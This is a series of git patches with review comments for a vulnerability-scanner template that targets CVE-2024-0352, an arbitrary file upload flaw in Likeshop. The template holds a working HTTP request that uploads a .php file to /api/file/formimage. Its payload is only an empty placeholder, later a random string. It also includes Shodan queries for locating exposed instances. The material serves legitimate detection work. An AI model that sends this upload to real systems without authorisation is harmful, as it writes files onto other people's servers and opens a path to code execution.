From aadb7084f245745a216707dc652606fde0e2ad62 Mon Sep 17 00:00:00 2001
From: cookie
Date: Wed, 10 Jan 2024 17:06:24 +0700
Subject: [PATCH 1/3] Added CVE-2024-0352 Template
---
http/cves/2024/CVE-2024-0352.yaml | 55 +++++++++++++++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-0352.yaml
diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml
new file mode 100644
index 0000000000..236deb2ed6
--- /dev/null
+++ b/http/cves/2024/CVE-2024-0352.yaml
@@ -0,0 +1,55 @@
+id: CVE-2024-0352
+
+info:
+ name: Likeshop < 2.5.7.20210311 - File Unrestricted Upload
+ author: CookieHanHoan,babybash,samuelsamuelsamuel
+ severity: high
+ description: |
+ A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
+ impact: |
+ The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
+ remediation: Update to the latest version
+ reference:
+ - https://vuldb.com/?id.250120
+ - Shodan Dork html:"/pc/_nuxt/"
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
+ cvss-score: 7.3
+ cve-id: CVE-2024-0352
+ cwe-id: CWE-434
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: likeshop
+ tags: cve2024,rce,upload-file,likeshop
+
+variables:
+ filename: "{{rand_base(6)}}"
+ shellcode: ""
+
+http:
+ - raw:
+ - |
+ POST /api/file/formimage HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+
+ ------WebKitFormBoundarygcflwtei
+ Content-Disposition: form-data; name="file";filename="{{filename}}.php"
+ Content-Type: application/x-php
+
+ {{shellcode}}
+ ------WebKitFormBoundarygcflwtei--
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "\"name\":\"{{filename}}.php\"")'
+ condition: and
+ extractors:
+ - type: json
+ part: body
+ json:
+ - ".data.url"
\ No newline at end of file
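Review bot: The `name` line gives the affected range as `< 2.5.7.20210311`, but the description in the same template says the flaw is in Likeshop "up to 2.5.7.20210311", so the title excludes the build the description includes; if the description is the accurate one, the title should use `<= 2.5.7.20210311`. `remediation: Update to the latest version` names no fixed release, which leaves a reader unable to tell which build closes the issue. The request also stores a `.php` file on the scanned host and nothing in the template removes it, so a comment above `http:` such as `# NOTE: a match leaves an uploaded .php file on the target; delete the path reported by the extractor afterwards` would tell operators to clean up.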
From 4e78e5b5e68cd62e6418b280286999049a7774e6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jan 2024 19:10:00 +0530 Subject: [PATCH 2/3] Update CVE-2024-0352.yaml --- http/cves/2024/CVE-2024-0352.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 236deb2ed6..f6d2b73db4 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -1,7 +1,7 @@ id: CVE-2024-0352 info: - name: Likeshop < 2.5.7.20210311 - File Unrestricted Upload + name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload author: CookieHanHoan,babybash,samuelsamuelsamuel severity: high description: | @@ -10,8 +10,7 @@ info: The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability. remediation: Update to the latest version reference: - - https://vuldb.com/?id.250120 - - Shodan Dork html:"/pc/_nuxt/" + - https://nvd.nist.gov/vuln/detail/CVE-2024-0352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R cvss-score: 7.3 @@ -20,12 +19,12 @@ info: metadata: verified: true max-request: 1 + shodan-query: title:"Likeshop" vendor: likeshop tags: cve2024,rce,upload-file,likeshop variables: filename: "{{rand_base(6)}}" - shellcode: "" http: - raw: @@ -39,7 +38,7 @@ http: Content-Disposition: form-data; name="file";filename="{{filename}}.php" Content-Type: application/x-php - {{shellcode}} + {{randstr}} ------WebKitFormBoundarygcflwtei-- matchers: 
@@ -47,9 +46,11 @@ http: dsl: - 'status_code == 200' - 'contains(body, "\"name\":\"{{filename}}.php\"")' + - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")' condition: and + extractors: - type: json part: body json: - - ".data.url" \ No newline at end of file + - ".data.url" From e1216d096dcd7a70cc39d5b3ddbd61371170eb9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jan 2024 21:14:22 +0530 Subject: [PATCH 3/3] shodan query update & tags --- http/cves/2024/CVE-2024-0352.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index f6d2b73db4..e3255da65d 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -19,9 +19,9 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"Likeshop" + shodan-query: http.favicon.hash:874152924 vendor: likeshop - tags: cve2024,rce,upload-file,likeshop + tags: cve,cve2024,rce,file-upload,likeshop,instrusive variables: filename: "{{rand_base(6)}}"
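Review bot: The first string in the added `contains_all` check, `"code\":1"`, has no closing delimiter, so it is also satisfied by a response whose code is 10, 12 or any other value that begins with 1. Anchoring it on the character that follows the value in the real response (for example `"code\":1,"`, assuming `code` is not the last key in the object) would keep the check tied to the success code. A one-line comment above `matchers:` stating that a match shows the server accepted and stored a `.php`-named file, not that the file is served or executed, would also help people triaging results, since the template is tagged `rce`. The `matchers:` key and the `- type: dsl` line sit just above this hunk and are not visible in it.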
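Review bot: The tag added at the end of the new `tags` line is spelled `instrusive`, so runs that select or exclude templates by the `intrusive` tag will not match this one even though it writes a file to the target. The line should read `tags: cve,cve2024,rce,file-upload,likeshop,intrusive`.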